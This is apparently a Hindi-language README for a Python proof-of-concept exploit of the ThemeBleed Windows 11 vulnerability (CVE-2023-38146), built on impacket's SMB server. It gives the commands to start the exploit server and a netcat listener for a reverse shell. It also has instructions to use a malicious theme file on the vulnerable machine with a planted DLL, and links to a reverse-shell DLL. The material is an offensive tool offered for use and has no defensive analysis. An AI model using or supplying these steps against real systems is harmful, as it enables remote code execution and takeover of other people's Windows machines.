
ThemeBleed Windows 11 CVE-2023-38146 के लिए python में impacket का उपयोग करके लिखा गया PoC। https://jnns.de/posts/cve-2023-38146-poc/
https://github.com/gabe-k/themebleed से अत्यधिक प्रेरित, जो केवल Windows पर चलता है (यही कारण है कि मैंने इसे लिखने का निर्णय लिया)।
संशोधित कोड का उपयोग impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py) से किया गया है।
उपयोगी सामग्री: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs
ब्लॉग पोस्ट: https://jnns.de/posts/cve-2023-38146-poc/
आवश्यकताएँ इंस्टॉल करें और एप्लिकेशन चलाएँ:
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
कमजोर मशीन पर "evil_theme.theme" या "evil_theme.themepack" का उपयोग करें।
सफलता!
एक DLL जिसमें "VerifyThemeVersion" नामक एक्सपोर्टेड फ़ंक्शन हो, उसे "./td/" फ़ोल्डर में "Aero.msstyles_vrf_evil.dll" नाम से रखें। आप Google का उपयोग करके एक उदाहरण DLL पा सकते हैं या मेरे उदाहरण का उपयोग कर सकते हैं: https://github.com/Jnnshschl/ThemeBleedReverseShellDLL।
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711